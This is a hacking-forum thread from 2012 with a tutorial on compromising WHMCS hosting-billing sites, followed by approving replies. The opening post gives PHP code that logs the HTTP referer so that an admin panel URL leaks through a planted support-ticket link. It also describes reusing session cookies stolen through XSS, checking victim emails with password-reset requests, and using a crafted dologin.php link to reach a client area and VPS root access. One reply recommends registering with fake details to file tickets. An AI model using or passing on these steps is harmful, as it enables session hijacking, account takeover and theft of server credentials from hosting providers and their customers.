Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


WHMCS Trick'z With XSS And Ref Link & rOoTiNg wiTh0u7 pAnEL

  • 8 Vote(s) - 3.88 Average


09-26-2012, 06:25 PM #1
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
Hello Mad'z

How Are You Brother'z ?

Today ,,We're Going To Get Admin Panel Link OF WHMCS

We Need PHP File

PHP Code:
<?php 
# Admin Link Finder Via XSS 
# Don't Forget To Inject Code :) 
# WWW.SEC4EVER.COM 
#404 
echo "404 Page Not Found"
$url $_SERVER['HTTP_REFERER']; 
$urlx = @fopen("URL.txt","w"); 
@
fwrite($urlx,"====================================================================== 
URL/Admin Panel : 
$url 
====================================================================== 
"
); 
?>

This Code We Need .. Now Upload it For AnyServer And Just

Submit New Ticket In WHMCS To Support Admin And Send Link OF PHP File Like This You CAn Make Message

Code:
Hello

I Need To Make Like This Site
http://site.tld/file.php

waiting support
thanks
H4x0r

oke this message contains
http://site.tld/file.php
this is ouR coDe to inject oke now go to see URL.txt FIle

[Image: Nup09644.png]:P

This Was The 1st Trick xP

The 2Nd Trick Is After XSS Codes ,, We Always Get Cookie But We See Firewall On Admin Panel
Like This

[Image: gxj10095.png]

So Here We're

We Want To Bypass This Firewall And Get Root To X Client Smiley1

Assume We've This Information

Cookiez

Code:
PHPSESSID=34820c5cad7Da21205091c36b749D085

E-Mail OF Client

Code:
[email protected]

We Can Get Cookies From XSS / Xss-Shell <Browser Attack> Or Any HTML Injection Smiley1 That's Not Matter
E-Mail OF Client We Can Get it From WHo IS Service OF Domain / Target

Now We've To Check if The Email Address Is correct or incorrect

Request Reset Password

[Image: Ked10893.png]
And Here Put E-Mail To Check


if you get message with E-Mail Sent ,, So E-Mail Address is Correct

[Image: yM310980.png]
E-Mail Is Correct Smiley1 # Zuhahah =))

Now We'll Put Cookies in Browser ,, I'm Using FireFox With FireBug/Fire Co()kie Addon

[Image: nAZ11269.png]
[Image: f5T11298.png]

Create C00kie And Put As We've Then Type F5

And You'll Get iN The Top of Page

[Image: eGO11421.png]

But The Problem Now We Can't Access Admin Panel Sadsmiley Because OF Fire Wall

Oke Our Magic Is found Tonguesmiley

Now Use This Link

http://site.tld/whmcs/dologin.php?u s e r n a m [email protected]

Don't Use Spaces In u$ername But I Used Because OF Security

So You'll Be In ClientArea Now Tonguesmiley

[Image: CZW12352.png]
Discover The Services And Product'z

[Image: zUz12272.png]

It's VPS Tonguesmiley Go 2 View Detail'z

[Image: 8ix12498.png]

Root Access Is ready =))

Just Say Zuhahahaha Tonguesmiley

Zuhahahaha ,,, We Got it Greet'z

h4x0rl1f3
shadow008
1337
Dr.Zombie
KhantastiC
TNT_HACKER
Th3 MMA
Zombie_KSA
Spiral
I-Hmx
Sec4ever
MadLeets

./b0x
Www://MadLeets.CoM

09-26-2012, 06:30 PM #2
1337 Offline Don't PM me for help, post it on forum ! *******
Administrators
Posts:520 Threads:106 Joined:Jun 2012 Reputation: 21
Mood: Hacker
Hahahahahahahahahahahahaha
Just Awesome Bro Biggrinsmiley

09-26-2012, 06:30 PM #3
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,126 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
That's way to sexy and full with Madness UnderTaker wink
Awesome shit wink

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


09-26-2012, 06:46 PM #4
SpOiler Offline Junior Member **
Registered
Posts:44 Threads:0 Joined:Jun 2012 Reputation: 0
Mood: None
Aweso0000me Biggrinsmiley

09-26-2012, 06:46 PM #5
Lnxr00t Offline MadLeets Vip ******
V.I.P
Posts:51 Threads:4 Joined:Jun 2012 Reputation: 0
Mood: None
Awesome tut. Biggrinsmiley

09-26-2012, 07:02 PM #6
Pain006 Offline Super Moderator ******
Super Moderators
Posts:575 Threads:28 Joined:Jun 2012 Reputation: 0
Mood: None
Great B0x Biggrinsmiley

09-26-2012, 07:10 PM #7
Darksnipper Offline Junior Administrator **********
Junior Administrator
Posts:639 Threads:77 Joined:Jun 2012 Reputation: 4
Mood: None
1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket

Visit My Site:-http://www.1337coders.org
[email protected]

09-26-2012, 07:17 PM #8
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,126 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
(09-26-2012, 07:10 PM)darksnipper Wrote:  1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket
well 99 % register users can submit, so you don't need to actually buy anything just register on web with fake info and submit wink
enjoy

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


09-26-2012, 07:19 PM #9
Darksnipper Offline Junior Administrator **********
Junior Administrator
Posts:639 Threads:77 Joined:Jun 2012 Reputation: 4
Mood: None
okz thanx let me try it Smiley1

1 mre questioN
MUST THE WHMCS Vul to xsS?

1 mre questioN
MUST THE WHMCS Vul to xsS?

Visit My Site:-http://www.1337coders.org
[email protected]

09-26-2012, 08:25 PM #10
THE RUDE Offline Respected *****
Respected
Posts:40 Threads:3 Joined:Jun 2012 Reputation: 0
Mood: None
its a GOD gifted exploit and its very nice bro
thanks Tonguesmiley






Forum Jump:


Users browsing this thread:1 Guest(s)